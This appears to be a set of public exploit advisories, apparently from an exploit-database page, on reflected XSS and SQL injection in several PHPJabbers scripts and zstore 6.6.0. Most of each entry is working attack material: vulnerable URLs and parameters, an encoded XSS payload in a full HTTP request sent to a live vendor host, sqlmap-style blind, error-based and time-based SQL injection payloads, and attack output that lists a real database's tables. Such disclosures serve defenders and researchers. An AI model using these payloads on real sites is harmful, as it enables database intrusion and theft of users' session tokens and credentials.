<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Car Park Booking System 2.0 - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to XSS<br /><br />/index.php?controller=pjFront&action=pjActionSearch&session_id=c6e6onmv599a10vr76oei88jh2&theme=1&locale=1&hide=0&index=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: zstore-6.6.0 - XSS-Reflected<br />## Development: nu11secur1ty<br />## Date: 01.29.2023<br />## Vendor: https://zippy.com.ua/<br />## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4<br />## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4<br /><br />## Description:<br />The value of manual insertion `point 1` is copied into the HTML<br />document as plain text between tags.<br />The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in<br />the manual insertion point 1.<br />This input was echoed unmodified in the application's response.<br /><br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br />```GET<br />GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a<br />HTTP/2<br />Host: store.zippy.com.ua<br />Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />```<br /><br />[+] Response:<br />```<br />HTTP/2 200 OK<br />Server: nginx<br />Date: Sun, 29 Jan 2023 07:27:55 GMT<br />Content-Type: text/html; charset=UTF-8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546<br /><br />Class \App\Pages\Chatgiflc<a<br />href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img<br />src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"><br /> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br><br />```<br /><br /><br />## Proof and Exploit:<br />[href](https://streamable.com/aadj5c)<br /><br />## Reference:<br />[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)<br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Event Ticketing System Script 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php<br /><br />/preview.php?lid=[XSS]<br /><br />GET parameter 'lid' is vulnerable to XSS<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Travel Tours Script 1.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /front.php<br /><br />front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=[SQLI]&rating_to=[SQLI]<br /><br />GET parameter 'rating_from' is vulnerable to SQLI<br /><br />---<br />Parameter: rating_from (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND 3442=3442 AND (7236=7236&rating_to=5<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9974=9974,1))),0x71626b7871),9974) AND (8540=8540&rating_to=5<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND (SELECT 2396 FROM (SELECT(SLEEP(5)))lmil) AND (1063=1063&rating_to=5<br />---<br /><br /><br />GET parameter 'rating_to' is vulnerable to SQLI<br /><br />---<br />Parameter: rating_to (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND 3784=3784 AND (4445=4445<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9427=9427,1))),0x71626b7871),9427) AND (7794=7794<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND (SELECT 9220 FROM (SELECT(SLEEP(5)))QqcU) AND (6313=6313<br />---<br /><br />[+] Starting the Attack<br /><br />fetching tables for database: '********_****_***'<br />Database: ********_****_***<br />[52 tables]<br />+------------------------------------------+<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_listings |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />+------------------------------------------+<br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Travel Tours Script 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /front.php<br /><br />/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&price_from=[XSS]&price_to=[XSS]&rating_from=[XSS]&rating_to=[XSS]<br /><br />/front.php?controller=pjListings&action=pjActionRegister&view=[XSS]&direction=[XSS]&listing_search=[XSS]<br /><br />/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&pjPage=[XSS]<br /><br /><br />GET parameter 'listing_search' is vulnerable to XSS<br /><br />GET parameter 'view' is vulnerable to XSS<br /><br />GET parameter 'season' is vulnerable to XSS<br /><br />GET parameter 'direction' is vulnerable to XSS<br /><br />GET parameter 'price_from' is vulnerable to XSS<br /><br />GET parameter 'price_to' is vulnerable to XSS<br /><br />GET parameter 'pjPage' is vulnerable to XSS<br /><br />GET parameter 'rating_from' is vulnerable to XSS<br /><br />GET parameter 'rating_to' is vulnerable to XSS<br /><br /><br />URL parameter to XSS<br /><br />/front.php/[XSS]?controller=pjListings&action=pjActionRegister&view=[XSS]t&direction=[XSS]&listing_search=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Property Listing Script 3.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: preview.php<br /><br />/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33<br /><br />GET parameter 'feature_id' is vulnerable to SQLI<br /><br />---<br />Parameter: feature_id (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'min_bedrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: min_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'max_bedrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: max_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'min_bathrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: min_bathrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'max_bathrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: max_bathrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching tables for database: '********_****_***'<br />Database: ********_****_***<br />[66 tables]<br />+------------------------------------------+<br />| property_listing_features |<br />| property_listing_fields |<br />| property_listing_multi_lang |<br />| property_listing_options |<br />| property_listing_passwords |<br />| property_listing_payments |<br />| property_listing_periods |<br />| property_listing_plugin_country |<br />| property_listing_plugin_galleries_set |<br />| property_listing_plugin_gallery |<br />| property_listing_plugin_locale_languages |<br />| property_listing_plugin_locale |<br />| property_listing_plugin_log_config |<br />| property_listing_plugin_log |<br />| property_listing_plugin_one_admin |<br />| property_listing_plugin_paypal |<br />| property_listing_plugin_sms |<br />| property_listing_properties_features |<br />| property_listing_properties |<br />| property_listing_roles |<br />| property_listing_types |<br />| property_listing_users |<br />| property_listing_features |<br />| property_listing_fields |<br />| property_listing_multi_lang |<br />| property_listing_options |<br />| property_listing_passwords |<br />| property_listing_payments |<br />| property_listing_periods |<br />| property_listing_plugin_country |<br />| property_listing_plugin_galleries_set |<br />| property_listing_plugin_gallery |<br />| property_listing_plugin_locale_languages |<br />| property_listing_plugin_locale |<br />| property_listing_plugin_log_config |<br />| property_listing_plugin_log |<br />| property_listing_plugin_one_admin |<br />| property_listing_plugin_paypal |<br />| property_listing_plugin_sms |<br />| property_listing_properties_features |<br />| property_listing_properties |<br />| property_listing_roles |<br />| property_listing_types |<br />| property_listing_users |<br />| property_listing_features |<br />| property_listing_fields |<br />| property_listing_multi_lang |<br />| property_listing_options |<br />| property_listing_passwords |<br />| property_listing_payments |<br />| property_listing_periods |<br />| property_listing_plugin_country |<br />| property_listing_plugin_galleries_set |<br />| property_listing_plugin_gallery |<br />| property_listing_plugin_locale |<br />| property_listing_plugin_locale_languages |<br />| property_listing_plugin_log |<br />| property_listing_plugin_log_config |<br />| property_listing_plugin_one_admin |<br />| property_listing_plugin_paypal |<br />| property_listing_plugin_sms |<br />| property_listing_properties |<br />| property_listing_properties_features |<br />| property_listing_roles |<br />| property_listing_types |<br />| property_listing_users |<br />+------------------------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Property Listing Script 3.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php<br />Method: GET<br /><br />/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=[XSS]&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=[XSS]&max_bedrooms=[XSS]&min_bathrooms=[XSS]&max_bathrooms=[XSS]&min_floor_area=11&max_floor_area=33<br /><br /><br />URL parameter 'for' is vulnerable to XSS<br /><br />URL parameter 'min_bedrooms' is vulnerable to XSS<br /><br />URL parameter 'max_bedrooms' is vulnerable to XSS<br /><br />URL parameter 'min_bathrooms' is vulnerable to XSS<br /><br />URL parameter 'max_bathrooms' is vulnerable to XSS<br /><br /><br />[-] Done<br /></code></pre>
